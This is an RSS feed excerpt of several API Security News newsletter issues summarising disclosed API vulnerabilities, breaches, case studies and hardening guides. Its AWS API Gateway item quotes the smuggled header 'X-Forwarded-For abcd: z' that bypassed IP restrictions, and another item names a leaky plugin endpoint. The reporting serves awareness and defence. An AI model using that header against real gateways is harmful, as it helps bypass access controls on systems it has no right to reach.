<p>I was <a href="https://sdtimes.com/api/a-developer-first-approach-what-does-this-mean-for-api-security/" target="_blank" rel="noopener noreferrer">pleased to be featured</a> in the SD Times this week, discussing what the shift-left approach means for API security.</p>
<p>Using the OpenAPI Specification (OAS) as &#8220;the single source of truth&#8221; allows progressive DevSecOps teams to shift security left by embedding security constructs into their OpenAPI definitions, and then use automation through the CI/CD pipeline to embed and inject security directly into APIs. The key challenge for developers is to fully embrace the &#8220;design first&#8221; approach to API design.</p>
<p>Ideally, embracing this shift-left approach enables joint ownership of security between both the development and security teams — the panacea of security being everyone&#8217;s responsibility.</p>
<h2>Best practices: 31 days of API security tips</h2>
<p>The renowned API security researcher Inon Shkedy <a href="https://github.com/inonshk/31-days-of-API-Security-Tips" target="_blank" rel="noopener noreferrer">provides a very useful resource</a> as 31 simple snippets in a GitHub repository to help improve the security of APIs. In many cases, the snippets are very succinct and easily actionable.</p>
<p>Although written from an offense perspective, this resource is valuable to API builders too. Know your enemy, or at least where you could go wrong.</p>
<h2>Webinar: Automate API Protection with “Security as Code”</h2>
<p>On 9 December 2021, at 8AM PDT / 11AM EST / 4PM GMT, 42Crunch will be hosting a webinar on automating API protection with “Security as Code”. The webinar (hosted by yours truly) demonstrates how DevSecOps teams can leverage the OAS to define security constructs <em>within</em> their APIs and then scale the protection by leveraging &#8220;security as code&#8221; to inject protection into a CI/CD pipeline.</p>
<p>What you will learn:</p>
<ul>
<li>How to automate injecting security policies into your CI/CD pipeline, such as Jenkins or Azure DevOps.</li>
<li>How to use an OpenAPI definition file to determine both the data contracts and the security controls within a single API.</li>
<li>How to accelerate the roll-out of secure APIs by bridging the gap between development and security teams.</li>
</ul>
<p>Click <a href="https://42crunch.com/automate-api-protection-with-security-as-code-webinar/" target="_blank" rel="noopener noreferrer">here</a> to register and reserve your spot.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-8813 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/11/Article5.jpg" alt="" width="602" height="290" /></p>
<p>The post <a href="https://apisecurity.io/issue-161-vulnerability-in-wipro-holmes-orchestrator-report-into-vulnerabilities-in-fintech-and-banking-apps/">Issue 161: Vulnerability in Wipro Holmes Orchestrator, report into vulnerabilities in FinTech and banking apps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 160: Vulnerability in AWS API gateway, Kubernetes API access hardening guide</title>
		<link>https://apisecurity.io/issue-160-vulnerability-aws-api-gateway-kubernetes-api-access-hardening-guide/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Nov 2021 04:05:51 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8778</guid>

					<description><![CDATA[<p>This week, we have a vulnerability in the AWS API gateway that allows a potential cache-poisoning attack, disclosed at the recent BlackHat Europe conference, a guide on how to harden Kubernetes API access, a report from Forbes on the need to take API security more seriously, and predictions on what&#8217;s possibly on the next OWASP [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-160-vulnerability-aws-api-gateway-kubernetes-api-access-hardening-guide/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-160-vulnerability-aws-api-gateway-kubernetes-api-access-hardening-guide/">Issue 160: Vulnerability in AWS API gateway, Kubernetes API access hardening guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a vulnerability in the AWS API gateway that allows a potential cache-poisoning attack, disclosed at the recent BlackHat Europe conference, a guide on how to harden Kubernetes API access, a report from Forbes on the need to take API security more seriously, and predictions on what&#8217;s possibly on the next OWASP API security Top 10.</p>
<h2>Vulnerability: AWS API gateway vulnerable to HTTP header-smuggling attack</h2>
<p>At the recent BlackHat Europe security conference, web security researcher Daniel Thatcher disclosed <a href="https://www.darkreading.com/vulnerabilities-threats/researcher-details-vulnerabilities-found-in-aws-api-gateway" target="_blank" rel="noopener noreferrer">vulnerabilities relating to the AWS API gateway</a> that allowed HTTP header smuggling. Currently, AWS has not responded to this research nor offered a comment regarding the potential vulnerabilities in their API gateway.</p>
<p><a href="https://portswigger.net/web-security/request-smuggling" target="_blank" rel="noopener noreferrer">PortSwigger sums up HTTP header smuggling</a> as am attack vector well:</p>
<blockquote><p><em>&#8220;HTTP request smuggling is a technique for interfering with the way a website processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.&#8221;</em></p></blockquote>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-8785" src="https://apisecurity.io/wp-content/uploads/2021/11/Article1.png" alt="" width="781" height="440" /></p>
<p>The actual attack that uncovered the vulnerability in AWS API gateway was very simple: Thatcher added <code>X-Forwarded-For abcd: z</code> to the header for HTTP requests, which bypassed the AWS IP address restriction policies in AWS API Gateway.</p>
<p>At its most serious, the vulnerability could allow an attacker to use HTTP header smuggling to sneak phony headers to the backend and launch a cache poisoning attack on the server. This in turn could allow the attacker to create their own API and return malicious content. Not the easiest one to exploit.</p>
<p>AWS has since fixed the vulnerability.</p>
<h2>Guide: Kubernetes API Access Security Hardening</h2>
<p>In any given Kubernetes deployment, the &#8220;control plane&#8221; is a component of critical importance in a Kubernetes instance, with the Kubernetes API being the gatekeeper to any and all operations that get executed within the instance. As such, the access to this API <em>must</em> be carefully controlled using strong authentication and authorization techniques.</p>
<p>Teleport has put together a <a href="https://goteleport.com/blog/kubernetes-api-access-security" target="_blank" rel="noopener noreferrer">concise guide</a> in which they provide recipes and best practice guides for hardening and securing Kubernetes deployments. The article provides detailed guidance on the following core topics:</p>
<ul>
<li>Kubernetes API network access best practices</li>
<li>Kubernetes API user account management best practices</li>
<li>Kubernetes API access authentication best practices</li>
<li>Kubernetes API access authorization best practices</li>
<li>Securing access to Kubernetes Kubelet</li>
<li>Additional security considerations for API access control</li>
</ul>
<p>With any complex software system, administrators are encouraged to be fully aware of the default configuration and its security implications, and are well-advised to follow such a guide to implementing the quick wins to harden their installations. If you work with Kubernetes, or are interested in it, do take a look.</p>
<h2>Report: Time to take API security more seriously</h2>
<p>The importance of API security to our modern economy was highlighted this week in <a href="https://www.forbes.com/sites/forbestechcouncil/2021/11/11/its-time-to-take-the-api-security-threat-more-seriously/?sh=30bef44f1b92" target="_blank" rel="noopener noreferrer">a feature by Forbes on why it&#8217;s time to take API security seriously</a>. Perhaps for regular readers of this newsletter, the conclusions do not come as a surprise, but it is heartening to see this topic given prime-time coverage in the mainstream media.</p>
<p>Forbes concludes that IT leaders would do well to focus energies on the following key areas:</p>
<ul>
<li>Consider all APIs a threat.</li>
<li>Keep an accurate, up-to-date inventory of APIs.</li>
<li>Look inside the luggage.</li>
<li>Get serious about DevSecOps.</li>
</ul>
<p>Forbes&#8217; conclusion is precise and to-the-point:</p>
<blockquote><p><em>&#8220;the best defense is to raise awareness as broadly as possible in your organization so that everyone whose job relates to designing, building and deploying software understands this enemy.&#8221;</em></p></blockquote>
<h2>Opinion: Predicting the next OWASP API Security Top 10</h2>
<p>Finally, a regular contributor to this newsletter, Jason Kent, provides some <a href="https://threatpost.com/owasp-api-security-top-10/175961/" target="_blank" rel="noopener noreferrer">predictions on what a new OWASP API Security Top 10</a> might look like.  The previous listing is from 2019, and two years can be a long time in tech, so it will be exciting to see how it eventually gets updated.</p>
<p>The key takeaway from Kent is the focus on shifting left in relation to API security. He predicts that both insecure design and data integrity failures will be added as new entries to the API Security Top 10. Unsurprisingly, identity and authentication failures and broken access control are likely to remain the two highest priority issues affecting API security.</p>
<p>If you are the betting kind, you could start considering your own opening antes.</p>
<p>The post <a href="https://apisecurity.io/issue-160-vulnerability-aws-api-gateway-kubernetes-api-access-hardening-guide/">Issue 160: Vulnerability in AWS API gateway, Kubernetes API access hardening guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 159: Vulnerability in GoCD CI/CD platform, views on full lifecycle API security, articles on API security and sprawl</title>
		<link>https://apisecurity.io/issue-159-vulnerability-gocd-ci-cd-platform-views-full-lifecycle-api-security-articles-api-security-sprawl/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Nov 2021 18:04:17 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8756</guid>

					<description><![CDATA[<p>This week, we have news of a high criticality vulnerability on GoCD, a common open-source CI/CD system, allowing attackers to hijack secrets of downstream supply chains. There is also an excellent article on the journey of Raiffeisen Bank International toward full lifecycle API security, another article on how API security is hindering application delivery, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-159-vulnerability-gocd-ci-cd-platform-views-full-lifecycle-api-security-articles-api-security-sprawl/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-159-vulnerability-gocd-ci-cd-platform-views-full-lifecycle-api-security-articles-api-security-sprawl/">Issue 159: Vulnerability in GoCD CI/CD platform, views on full lifecycle API security, articles on API security and sprawl</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a high criticality vulnerability on GoCD, a common open-source CI/CD system, allowing attackers to hijack secrets of downstream supply chains. There is also an excellent article on the journey of Raiffeisen Bank International toward full lifecycle API security, another article on how API security is hindering application delivery, and a report on the continued API sprawl by F5.</p>
<h2>Vulnerability: Popular GoCD CI/CD platform vulnerability disclosed</h2>
<p>This week, SonarSource warned of a <a href="https://www.securityweek.com/critical-gocd-authentication-flaw-exposes-software-supply-chain" target="_blank" rel="noopener noreferrer">highly critical vulnerability in the common open-source CI/CD system, GoCD</a>. The vulnerability could allow attackers to gain access to critical pipeline data, including secrets such as API tokens or credentials for downstream supply chain elements.</p>
<p>The vulnerability was caused by shortcomings in how GoCD build agents (aka workers) authenticated themselves to the GoCD master, which allowed fake agents to be inserted into a pipeline. Once an agent had been enrolled into a pipeline, it then had access to all tokens and secrets within the CI/CD pipeline as well as the ability to execute arbitrary code within the context of the pipeline.</p>
<p>Although organizations typically deploy build agents on internal networks where they are protected from impersonation by rogue agents, there are several hundred instances of GoCD exposed to the internet.</p>
<p>The affected versions of GoCD range from v20.6.0 to v21.2.0, and the vulnerability has been resolved in version v21.3.0, so if you are affected, patch yours as soon as possible.</p>
<p>The key takeaway here is that the CI/CD system is a vital component of supply chain infrastructure and should be protected at a variety of levels. 2022 is likely to become the year of supply chain attacks!</p>
<h2>Case study: Raiffeisen Bank International on their journey toward full lifecycle API security</h2>
<p>SecurityBoulevard featured <a href="https://securityboulevard.com/2021/11/raiffeisen-bank-internationals-journey-to-full-lifecycle-api-security/" target="_blank" rel="noopener noreferrer">an excellent case study</a> from Raiffeisen Bank International (RBI) based on an interview with Peter Gerdenitsch, Group CISO at RBI.</p>
<p>Gerdenitsch describes how RBI made a shift toward a product-led agile structure in 2019. This transition included the role of Security Champion within each of the product DevSecOps teams:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8766" src="https://apisecurity.io/wp-content/uploads/2021/11/Article2b.jpg" alt="" width="602" height="230" /></p>
<p>Security Champions lead in all aspects of product security within their business unit. A key point to the role is that it is a volunteer-driven role. RBI&#8217;s experience was that they had no shortage of volunteers and that they got much interest from a variety of disciplines within the organization. As with many popular Security Champion programs, RBI opted to use the martial arts&#8217; belt system, shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8765" src="https://apisecurity.io/wp-content/uploads/2021/11/Article2-1.jpg" alt="" width="669" height="284" /></p>
<p>In terms of API security, the blue belt level included  specialized courses just on API security and at the black belt level the focus was on hands-on manual pentest skills.</p>
<p>As regards to APIs, RBI had a large estate — 100 external APIs under Payment Service Directive (PSD) scope, plus a thousand or more internal APIs on top of that. As is typical in large organizations, RBI found that what they lacked was an extensive inventory of their APIs. They addressed this with Real-Time Integration Center of Excellence (RICE), which acted as a central management layer for all RBI&#8217;s APIs. Another key approach  was to ensure that both the product owner and the IT security teams were involved in securing their APIs.</p>
<p>This case study is a highly recommended read for anyone wanting to scale their API security initiatives, and particularly useful for security and AppSec leaders tasked with the responsibility of incorporating API security into their portfolio of coverage.</p>
<h2>Article: API security hindering application delivery</h2>
<p>DarkReading has featured an article on <a href="https://www.darkreading.com/vulnerabilities-threats/api-security-issues-hinder-application-delivery" target="_blank" rel="noopener noreferrer">why API security is hindering application delivery</a>.</p>
<p>According to research from Cloudentity, key findings are that nearly all organizations have experienced delays in releasing new applications or updates due to concerns for the security of their API environment.  Approximately 44% of them say they have experienced API security issues, such as data leakage and exposure of private information.</p>
<p>As possibly expected, the most commonly cited reasons for this predicament include:</p>
<ul>
<li>The high financial costs associated with API security</li>
<li>The demands of faster application delivery timelines</li>
<li>A lack of awareness regarding API security</li>
</ul>
<p>The report concludes that API security is likely to received increased focus and attention and — correspondingly — increased budgets in the coming years.</p>
<h2>Report: F5 detailing the continued sprawl of APIs</h2>
<p>Finally this week, a brief piece from in HelpNetSecurity on a <a href="https://www.helpnetsecurity.com/2021/11/09/api-sprawl-threat/" target="_blank" rel="noopener noreferrer">recent F5 report detailing the continued sprawl of APIs</a>. According to the report:</p>
<blockquote><p><em>“We estimate that the number of public and private APIs today is approaching 200 million, and by 2031 that number could be in the billions”</em></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8768" src="https://apisecurity.io/wp-content/uploads/2021/11/Article4.jpg" alt="" width="625" height="419" /></p></blockquote>
<p>The reasons for the increased sprawl stated in the report include:</p>
<ul>
<li>A lack of global standards leading to re-implementation of APIs</li>
<li>The growth of microservices</li>
<li>Increased software released cadences</li>
<li>Increased interoperability required within large enterprises</li>
<li>Siloed business units duplicating the effort</li>
</ul>
<p>The increased sprawl leads to increased operation and security challenges, making it something to keep an eye on in terms of API security.</p>
<p>The post <a href="https://apisecurity.io/issue-159-vulnerability-gocd-ci-cd-platform-views-full-lifecycle-api-security-articles-api-security-sprawl/">Issue 159: Vulnerability in GoCD CI/CD platform, views on full lifecycle API security, articles on API security and sprawl</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 158: Data of 400 000 students exposed, 1 million sites affected by plugin vulnerabilities, views on GraphQL</title>
		<link>https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Nov 2021 19:29:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8733</guid>

					<description><![CDATA[<p>This week, we have news on a breach affecting 400 000 users of a popular German school app, and another vulnerability in a popular WordPress plugin. In addition, there&#8217;s a thought-provoking opinion piece on the value of GraphQL on public interfaces, and an article featuring nine useful API testing tools. Breach: Sensitive data of 400 [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/">Issue 158: Data of 400 000 students exposed, 1 million sites affected by plugin vulnerabilities, views on GraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news on a breach affecting 400 000 users of a popular German school app, and another vulnerability in a popular WordPress plugin. In addition, there&#8217;s a thought-provoking opinion piece on the value of GraphQL on public interfaces, and an article featuring nine useful API testing tools.</p>
<h2>Breach: Sensitive data of 400 000 German students exposed by API flaw</h2>
<p>Last week, the news broke of <a href="https://www.bleepingcomputer.com/news/security/sensitive-data-of-400-000-german-students-exposed-by-api-flaw/" target="_blank" rel="noopener noreferrer">a breach on a popular German student community app, Scoolio</a>, discovered by security researcher Lilith Wittmann. Conservative estimates put the number of affected students to 400 000 students, but how Scoolio creates user accounts throws some uncertainty to the exact figure here.</p>
<p>Wittman <a href="https://zerforschung.org/posts/scoolio/" target="_blank" rel="noopener noreferrer">describes (in German)</a> how she was able to exploit the Scoolio API to retrieve sensitive user data, such as:</p>
<ul>
<li>User nicknames</li>
<li>User and parent email addresses</li>
<li>GPS location of last app use</li>
<li>Name of school and class</li>
<li>Personality traits like origin, religion, sexuality</li>
</ul>
<p>Below shows an example of the type of user information leaked:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8740" src="https://apisecurity.io/wp-content/uploads/2021/11/Article1.jpg" alt="" width="617" height="632" /></p>
<p>It took the developers of Scoolio just over a month to deploy a fix for the issue, but they were gracious enough to publicly thank Wittman for her responsible disclosure.</p>
<p>The precise nature of the vulnerability was not disclosed, but it would appear that this may be an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a>, based on the UUIDs of accounts.</p>
<h2>Vulnerability: OptinMonster WordPress plugin affects 1 million sites</h2>
<p>Another week, <a href="https://www.wordfence.com/blog/2021/10/1000000-sites-affected-by-optinmonster-vulnerabilities/" target="_blank" rel="noopener noreferrer">another vulnerability affecting users of WordPress</a>, this time in a popular marketing plugin called OptinMonster. The vulnerability is <a href="https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/" target="_blank" rel="noopener noreferrer">similar to previous</a> plugin vulnerabilities we have seen: API endpoints exposed by the plugin were not properly secured, allowing an attacker to compromise the deployment.</p>
<p>The vulnerability was discovered by the Wordfence team, who swiftly moved swiftly to protect their affected customers, and advised OptinMonster, who responded equally swiftly and patched the issue in version 2.6.5 of the plugin.</p>
<p>It turned out that many of the REST API endpoints were not securely implemented, which allowed attackers multiple pathways to access an affected installation. The most serious was the endpoint <code class="language-markup">/wp-json/omapp/v1/support</code> which actually disclosed an API key used to make requests to the OptinMonster website. An attacker could easily use this API key to make changes to any campaigns associated with it, including potentially embedding dangerous JavaScript code.</p>
<p>As we have seen with similar plugin vulnerabilities in WordPress, it tends to originate in how the <code class="language-markup">permissions_callback</code> method is implemented. WordPress core triggers this callback to allow the plugin to validate the API request, typically by performing checks on the authentication and authorization of the caller. Unfortunately, the implementation in the OptinMonster case left a lot to be desired, as there was no attempt at checking the caller&#8217;s permissions. All that was required was that the caller was logged in and had a valid API key! A good example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a>.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8744" src="https://apisecurity.io/wp-content/uploads/2021/11/Article2.jpg" alt="" width="621" height="187" /></p>
<p>The key takeaway here is for API developers to ensure that all API callers are fully authorized for the API endpoints being called.</p>
<h2>Opinion: GraphQL is not meant to be exposed over the internet</h2>
<p><a href="https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/" target="_blank" rel="noopener noreferrer">Previously, we have featured</a> Jens Neuse&#8217;s view on hardening and securing GraphQL implementations. This week, <a href="https://medium.com/@Growth_at_Wundergraph/graphql-is-not-meant-to-be-exposed-over-the-internet-f502a61a64d6" target="_blank" rel="noopener noreferrer">he is back discussing GraphQL</a> in a provocative article that suggests that GraphQL should not be exposed over the internet!</p>
<p>According to Neuse, in many cases GraphQL is an unnecessary indulgence that is not required from a technical perspective and adds to risk exposure. Typically the benefits of GraphQL only manifest for the so-called &#8216;unicorns&#8217; like Facebook and GitHub. Neuse&#8217;s advice is to consider if you really need GraphQL at all.</p>
<p>Neuse recommends that a security review of risks should be conducted if GraphQL be used at all, paying special attention to the following:</p>
<ul>
<li>How secure are the libraries upon which your endpoint is built?</li>
<li>Do you understand how they work and what limitations they may have?</li>
<li>Are you inadvertently exposing your API even if you disable the visual GraphQL playground?</li>
<li>Are you enabling the introspection query which could leak sensitive information like the underlying data schema?</li>
<li>Are you aware of schema traversal attacks?</li>
</ul>
<p>Anyone considering a GraphQL implementation would do well to read and understand this article, as well as <a href="https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready" target="_blank" rel="noopener noreferrer">its prequel</a>. As Neuse concludes with tongue firmly in cheek:</p>
<blockquote><p>&#8220;<em>If you want to be 100% safe, you should consider unplugging the network cable. However, this comes with some inconvenient drawbacks.&#8221;</em></p></blockquote>
<h2>Guide: Nine online API testing tools</h2>
<p>Last but not least this week is a <a href="https://www.makeuseof.com/best-online-api-testing-tools/" target="_blank" rel="noopener noreferrer">quick read</a> from Idowu Omisola on nine online API testing tools.</p>
<p>The article covers some of the industry-standard tools, such as Postman and Swagger Inspector, but also features some lesser-known tools like the excellent Paw for MacOS users and the updated Fiddler Everywhere from Telerik.</p>
<p>All in all, a useful guide for any API tester or hacker.</p>
<p>The post <a href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/">Issue 158: Data of 400 000 students exposed, 1 million sites affected by plugin vulnerabilities, views on GraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 157: Unsafe defaults in Prometheus, mapping API attack surfaces, OpenAPI file trend analysis</title>
		<link>https://apisecurity.io/issue-157-unsafe-defaults-in-prometheus-mapping-api-attack-surfaces-openapi-file-trend-analysis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 Oct 2021 17:55:12 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8705</guid>

					<description><![CDATA[<p>This week, we have details of a potential vulnerability in existing Prometheus installations with no endpoint security enabled, details of a new tool to assist organizations map their API attack surface, a report on the analysis of publicly available OpenAPI definition files in the public domain, and news on upcoming API security awareness and training [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-157-unsafe-defaults-in-prometheus-mapping-api-attack-surfaces-openapi-file-trend-analysis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-157-unsafe-defaults-in-prometheus-mapping-api-attack-surfaces-openapi-file-trend-analysis/">Issue 157: Unsafe defaults in Prometheus, mapping API attack surfaces, OpenAPI file trend analysis</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details of a potential vulnerability in existing Prometheus installations with no endpoint security enabled, details of a new tool to assist organizations map their API attack surface, a report on the analysis of publicly available OpenAPI definition files in the public domain, and news on upcoming API security awareness and training from We Hack Purple.</p>
<h2>Vulnerability: Unsafe defaults in Prometheus expose secrets</h2>
<p>JFrog recently published a report on a <a href="https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/" target="_blank" rel="noopener noreferrer">potential vulnerability in Prometheus</a>, a popular open-source event monitoring and alerting solution. Attackers could parse unsecured endpoints to retrieve sensitive data.</p>
<p>Previously, the metrics had not been considered sensitive at all, but in version 2.24.0 support for TLS and basic authentication were added. Unfortunately, because this is a relatively new feature (v2.24.0 was released in January 2021) and many installations in the public domain still use an older version, JFrog concludes that large-scale data exfiltration is still currently possible.</p>
<p>The authors describe some elementary intelligence gathering techniques using Shodan and ZoomEye to ingest data from over 27 000 hosts. Their findings included:</p>
<ul>
<li>Sensitive operational information like usernames and passwords were exposed.</li>
<li>15.6% of endpoints had exposed and unsecured administration interfaces.</li>
</ul>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8713" src="https://apisecurity.io/wp-content/uploads/2021/10/Article1-2.jpg" alt="" width="606" height="376" /></p>
<p>&nbsp;</p>
<p>The key takeaways here are:</p>
<ul>
<li>If you are concerned with unintended information exposure, enable both basic authentication and TLS in your Prometheus setup.</li>
<li>Be wary of default settings in any system, their security level might not be what you want and might have unintended consequences.</li>
</ul>
<h2>Tools: Free tool for mapping API attack surface</h2>
<p>The old adage of &#8220;you can&#8217;t improve what you can&#8217;t measure&#8221; applies equally well to security: you can&#8217;t secure what you don&#8217;t know about. API security is no different beast here.</p>
<p>API discovery is increasingly under the spotlight because it enables organizations to understand the extent of their risk exposure stemming from their API estate. In complex organizations, the vast variety of internal and external APIs, programming language and framework choices, and hosting or cloud environments can make this — or even estimating your attack surface — a challenging undertaking. The most likely result is a wild &#8220;finger in the air&#8221; estimate.</p>
<p>Luckily, there is <a href="https://www.darkreading.com/dr-tech/free-tool-helps-security-teams-measure-their-api-attack-surface" target="_blank" rel="noopener noreferrer">a free API attack surface calculator</a> to get you started. It allows you to get an (albeit very basic) estimate of your API attack surface based on a few basic, easily identified parameters. While not being a discovery tool proper, undertaking such an estimate should be illuminating in its own right: what are the knowns, what are the unknowns, where more information is required, where should an organization start with their API security initiative.</p>
<h2>Report: Analyzing trends in OpenAPI files</h2>
<p>The increased adoption of the OpenAPI Specification (OAS) standard over the last decade has resulted in a vast number of OpenAPI definition files in public repositories.</p>
<p><a href="https://nordicapis.com/analyzing-trends-across-200000-openapi-files/" target="_blank" rel="noopener noreferrer">In a fascinating report</a>, courtesy of Nordic APIs, the Australian security company Assetnote scanned over 200 000 publicly available OpenAPI files, with the goal of discovering underlying trends and patterns in them.</p>
<p>In summary, some of the key findings here include:</p>
<ul>
<li>79% of API definitions are valid OpenAPI definitions — so conforming to the standard — which bodes well for the continued adoption of the OAS in large.</li>
<li>APIs are increasingly complex: on average, each API had 37 paths and 51 endpoints.</li>
<li>Understandably, <code>GET</code> is the most frequently used method, followed by <code>POST</code>.</li>
<li>Most APIs tend to favor basic authentication<em>, </em>followed by API key methods. Somewhat worryingly, the third most popular option is <em>having no security at all</em>!</li>
</ul>
<h2>Training: We Hack Purple offers API security awareness and training</h2>
<p>The continued interest in API security is being reflected in the availability of new, quality training offerings.</p>
<p>This week, we have news of an <a href="https://twitter.com/wehackpurple/status/1451549091549388803" target="_blank" rel="noopener noreferrer">API security awareness event</a>, featuring Isabelle Mauny (field CTO of 42Crunch) in a conversation with Tanya Janca (aka. <a href="https://twitter.com/shehackspurple" target="_blank" rel="noopener noreferrer">@shehackspurple</a>) as part of Tanya&#8217;s new <a href="https://twitter.com/wehackpurple" target="_blank" rel="noopener noreferrer">We Hack Purple</a> academy and community.</p>
<p>Also of interest to API security practitioners will be the<a href="https://newsletter.wehackpurple.com/apisecurity?utm_source=hootsuite&amp;utm_medium=Photo&amp;utm_term=&amp;utm_content=&amp;utm_campaign=API+Security" target="_blank" rel="noopener noreferrer"> upcoming mini-course</a> from the We Hack Purple community. I look forward to featuring the course in this newsletter once it is available.</p>
<p>The post <a href="https://apisecurity.io/issue-157-unsafe-defaults-in-prometheus-mapping-api-attack-surfaces-openapi-file-trend-analysis/">Issue 157: Unsafe defaults in Prometheus, mapping API attack surfaces, OpenAPI file trend analysis</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 156: FHIR APIs vulnerable to abuse, 3D printers facing hijacking risk, API security webinar</title>
		<link>https://apisecurity.io/issue-156-fhir-apis-vulnerable-abuse-3d-printers-facing-hijacking-risk-api-security-webinar/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 Oct 2021 17:20:41 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8677</guid>

					<description><![CDATA[<p>This week, we have a vulnerability report from Alissa Knight on Fast Healthcare Interoperability and Resources (FHIR) APIs being potentially vulnerable to abuse, and more details on how the breach at MakerBot&#8217;s Thingiverse 3D printing repository website could lead to hijacking users&#8217; 3D printers. In addition, there&#8217;s an article summing up the increasing numbers of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-156-fhir-apis-vulnerable-abuse-3d-printers-facing-hijacking-risk-api-security-webinar/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-156-fhir-apis-vulnerable-abuse-3d-printers-facing-hijacking-risk-api-security-webinar/">Issue 156: FHIR APIs vulnerable to abuse, 3D printers facing hijacking risk, API security webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a vulnerability report from Alissa Knight on Fast Healthcare Interoperability and Resources (FHIR) APIs being potentially vulnerable to abuse, and more details on how the breach at MakerBot&#8217;s Thingiverse 3D printing repository website could lead to hijacking users&#8217; 3D printers.</p>
<p>In addition, there&#8217;s an article summing up the increasing numbers of API attacks and breaches, and an upcoming Kuppinger Cole webinar on continuous API security.</p>
<h2>Vulnerability: FHIR APIs vulnerable to abuse</h2>
<p>This week saw <a href="https://www.scmagazine.com/analysis/application-security/critical-flaws-found-in-interoperability-backbone-fhir-apis-vulnerable-to-abuse" target="_blank" rel="noopener noreferrer">the release of the cybersecurity researcher Alissa Knight&#8217;s latest research into FHIR APIs and the mobile apps that access them</a>.</p>
<p>The key finding is that although the APIs themselves are well-secured, there were serious shortcomings detected in the downstream mobile apps that consume the APIs. Knight concluded that these weaknesses in the &#8220;last mile&#8221; could seriously compromise both personally identifiable information (PII) and protected health information (PHI) of users. One app allowed accessing a whopping 4 million patient and clinician records when logged into as a single patient!</p>
